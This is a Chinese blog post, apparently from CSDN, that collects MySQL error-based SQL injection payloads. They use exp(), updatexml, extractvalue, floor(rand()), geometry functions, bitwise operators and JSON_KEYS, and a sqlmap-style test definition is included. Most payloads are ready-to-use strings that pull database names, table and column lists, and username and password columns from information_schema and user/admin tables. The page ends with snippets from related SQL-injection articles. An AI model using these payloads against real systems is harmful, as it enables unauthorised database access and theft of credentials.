1、SQL注入语句之Mysql(3)Error Based

最新推荐文章于 2023-06-25 15:20:40 发布
最新推荐文章于 2023-06-25 15:20:40 发布
阅读量789 收藏 1
点赞数
分类专栏: SQL注入汇总
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/98481571
版权

1.exp() MySQL>=5.5.5 

select * from products where pid=1 and exp(~(select * from(select user())a)); 

1 and exp(~(select*from(select convert(concat(database(),0x7c,user(),0x7c,version())using latin1))a))-- 

1 and exp(~(select*from(select group_concat(table_name)from information_schema.tables where table_schema=database())a))-- 

1 and exp(~(select*from(select group_concat(column_name)from information_schema.columns where table_name='user')a))-- 

1 and exp(~(select*from(select concat(host,0x7c,user,0x7c,password)from user limit 0,1)a))-- 

 

1 and exp(~(select*from(select @a:=(select @b:=schema_name from{a information_schema.schemata} limit 0,1))a))# 

1 and exp(~(select*from(select @a:=schema_name from{a information_schema.schemata} limit 0,1)a))# 

 

1 and exp(~(select*from(select @a:=(select @b:=table_name from{a information_schema.tables} where table_schema='uat_db_web' limit 1,1))a))# 

 

2.函数extractvalue(),updatexml() Mysql>=5.1.5 

1' and `updatexml` (1,concat(0x7e,database()),1)or' 

1' and `extractvalue` (1,concat(0x7e,database()),1)or'

 

3.函数floor()

and (select 1 from (select count(*),concat(0x7e7e,version(),0x7c,user(),0x7c,database(),0x7c,@@datadir,0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a); 

and (select 1 from (select count(*),concat(0x7e7e,(select concat(username,0x3a,password,0x3a,encrypt,0x3a,roleid) from admin limit0,1),0x7e7e,floor(rand(0)*2))x from information_schema.tables group by x)a); 

and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

select count(*) from admin group by concat(version(),floor(rand(0)*2)); 

select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 

 

4.GemetryCollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring() 

select * from products where pid=1 and geometrycollection((select * from(select * from(select user())a)b)); 

select * from products where pid=1 and multipoint((select * from(select * from(select user())a)b)); 

select * from products where pid=1 and polygon((select * from(select * from(select user())a)b)); 

select * from products where pid=1 and multipolygon((select * from(select * from(select user())a)b)); 

select * from products where pid=1 and linestring((select * from(select * from(select user())a)b)); 

select * from products where pid=1 and multilinestring((select * from(select * from(select user())a)b)); 

select name from member where num=1 and polygon(已知列名)----爆出当前库/表名 

select name from member where num=1 and linestring(已知列名)----爆出当前库/表名 

 

5.~ MySQL>=5.5.5 && not suite for MariaDB 

select ~0+!(select*from(select user())x); 

select !(select*from(select user())x)-~0; 

select (select(!x-~0)from(select(select user())x)a); 

select (select!x-~0.from(select(select user())x)a); 

' or !(select*from(select user())x)-~0 or ' 

select host from mysql.user where 1='' or !(select*from(select user())x)-~0 or '' ; 

 

select !atan((select*from(select user())a))-~0; 

' or !atan((select*from(select user())a))-~0 or ' 

select !log((select*from(select user())a))-~0; 

' or !log((select*from(select user())a))-~0 or ' 

select !floor((select*from(select user())a))-~0; 

' or !floor((select*from(select user())a))-~0 or ' 

 

select !(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0 

select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0; 

select !(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0; 

 

select !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 

select (select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) 

select (select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) 

 

 

6.other 

select name from member where num=1 and (select*from(select*from member as a join member as b)as c)----爆出第1列列名num 

select name from member where num=1 and (select*from(select*from member as a join member as b using(num))as c)----爆出第2列列名name 

select name from member where num=1 and (select*from(select*from member as a join member as b using(num,name))as c)----爆出第3列列名birthday 

select name from member where num=1-a()----爆出当前库名 

select 9999999999*9999999999; 

 

7.Json 

<test> 

  <title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS FUNCTION)</title> 

  <stype>2</stype> 

  <level>1</level> 

  <risk>0</risk> 

  <clause>1,2,3</clause> 

  <where>1</where> 

  <vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</vector> 

  <request> 

    <payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))USING UTF8)))</payload> 

  </request> 

  <response> 

    <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep> 

  </response> 

  <details> 

    <dbms>MySQL</dbms> 

    <dbms_version>>= 5.7</dbms_version> 

  </details> 

</test> 

 

 

 

 

daxi0ng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-error、boolean、time-based and 宽字节
我不是大牛
06-24 1819
1、Error-based SQL injection 利用前提: 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysqli_error() 优点: 不需要显示位 缺点: 需要输出mysqli_error( )的报错信息 通过floor报错 select 列1(count()) , 列2(concat()随机数) as x from 表 group by x; select c...
web安全性测试之sql注入入门篇
03-30
sql注入入门适合初学者,简单易学!sql注入入门适合初学者,简单易学!sql注入入门适合初学者,简单易学!
深层error-base的sql注入攻击
09-05
error-base的sql注入,一片外国文档
union注入 (Error based)
soldi_er的博客
02-28 269
文章目录探测漏洞利用漏洞基础补充 探测漏洞 GET参数id 重点在于系统是否执行了我们输入的语句 单引号:?id=1’ 逻辑:对比两个页面 ?id=1 and 1=1和?id=1 and 1=2(数字型注入) ?id=1’ and ‘1’=‘1和?id=1’ and ‘1’='2(字符型注入) 加减:对比两个页面 ?id=2-1和?id=1 利用漏洞 基础   联合注入条件:有回显位。知道字段数。   联合注入语句: 查字段:?id=1’ order by x#(查询有结果才能排序) 联合:?id=0’
Error Based Injection和sql注入函数
kjcxmx的博客
01-09 2640
Error Based Injection和sql注入函数
SQL注入MySQL注入天书(1-4) Error Based
无名J0kзr的博客
01-29 1313
文章目录注入流程 注入流程 输入一个参数id,返回两个参数,说明SELECT的至少有username和password两个字段,存放这两个字段的表至少有三个字段id, username, password 单引号判断在id处有注入点 使用ORDER BY判断出表中有3个字段 使用UNION确定到底SELECT了几个字段 首先用一个非法的id值-1,这样根据id选出来的字段值为空,可显示出...
Error-based
weixin_33882443的博客
07-13 378
1.将聚合函数count()和group by语句联合起来迫使sql查询语句返回错误(主键重复)   须知:     floor:函数只返回整数部分,小数部分舍弃。     round:函数四舍五入,大于0.5的部分进位,不到则舍弃。     floor(rand(0)*2)前面产生的随机数是确定的011011...     1>mysql在遇到select count(*) f...
SQL注入思路详解
12-14
2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。 3. **布尔盲注(Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间盲注(Time ...
mysql错误处理之ERROR 1665 (HY000)
12-15
执行SQL语句的时候报错: ERROR 1665 (HY000): Cannot executestatement: impossible to write to binary log since BINLOG_FORMAT = STATEMENTand at least one table uses a storage engine limited to row-based...
SQL注入大餐必备餐具SQLMA
11-06
SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来操纵后端数据库,进而获取敏感信息或控制数据库。为了有效地进行SQL注入攻击,通常会使用专门的工具来辅助,其中最著名的就是...
Python:SQLMap源码精读—基于错误的盲注(error-based blind)
weixin_34152820的博客
07-28 204
目标网址 http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 Payload的生成 1 &lt;test&gt; 2 &lt;title&gt;MySQL &amp;gt;= 5.0 AND error-based - WHERE or HAVING clause&lt;/title&gt; 3 &lt;...
【sqli-labs】 less44 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...
ajxi63204的博客
01-31 172
盲注漏洞,登陆失败和注入失败显示的同一个页面 可以用sleep函数通过延时判断是否闭合引号成功 这个方法有一点不好的地方在于,并不能去控制延时,延时的时间取决于users表中的数据数量和sleep函数的参数 login_user=1&login_password=1' or sleep(0.1)# 14条数据延时了1.4s 但延时的出现就证明引...
sqli-labs练习(二)----------GET-Error based-ingiter based
wkend的博客
04-15 354
这一节是数字型注入, sql查询语句源码$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 可以看到,$id并没有用单引号括起来,在sql语句中,对于数字型是数据可以不加单引号,不用考虑单引号的闭合以及注释问题。 输入1,查看结果 输入1',查看结果 由此可以判定,这是属于数字型sql注入。 所以,这里和上一节的区别就是不加单引...
sqli-labs之Error Based Exploitation小结
极光时流
11-12 631
sqli-labs之Error Based Exploitation小结 Less-1 Lesson 1 id=1’ --&amp;amp;gt;’ ‘1’’ LIMIT 0,1 ’ id=1’’ --&amp;amp;gt; right id=1\ --&amp;amp;gt;’ 1’ LIMIT 0,1 ’ id=1’order by 3 --&amp;amp;gt; ’
SQL渗透与防御——(四)基于报错注入
FisrtBqy的博客
03-06 485
第四章 基于报错注入 1.User-Agent注入 修改消息头的User-Agent参数 单引号报错判断 推测语句 其源码有可能是insert into tablename value(1,2) 那么就要闭合value()中的右括号a',(select database())) # [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 2.Stacked queries堆叠注入 #可以执行多条SQL语句 select * from user;select * from u
SQL学习之default约束
爱喝水的qdy的博客
12-12 771
目录参考源SQL default 约束create table 时指定 default 约束alter table 时的 SQL default 约束MySQLSQL Server / MS AccessOracle删除 default 约束MySQLSQL Server / Oracle / MS Access 参考源 简单教程 https://www.twle.cn/l/yufei/sql...
Xray捡洞中的高频漏洞
热门推荐
m0_49936858的博客
08-12 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危。
软件测试|SQL DEFAULT约束怎么用?
最新发布
Tester_muller的博客
06-25 915
在SQL中,DEFAULT约束是一种用于设置列默认值的强大工具。本文将深入探讨DEFAULT约束的概念、应用场景以及使用方法,以帮助读者更好地理解和利用DEFAULT约束来简化数据插入和更新操作。获取更多技术资料,请点击!DEFAULT约束是SQL中设置列默认值的强大工具。通过使用DEFAULT约束,可以简化数据插入和更新操作,确保数据的完整性和一致性。在设计数据库表和进行数据操作时,我们应充分利用DEFAULT约束来提高数据操作的效率和准确性。
xray Web扫描器学习记录
weixin_50464560的博客
06-06 4115
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值